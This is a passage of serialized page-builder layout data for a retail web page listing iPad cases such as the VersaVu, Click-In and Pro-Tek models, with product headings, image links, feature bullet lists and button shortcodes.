\\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton 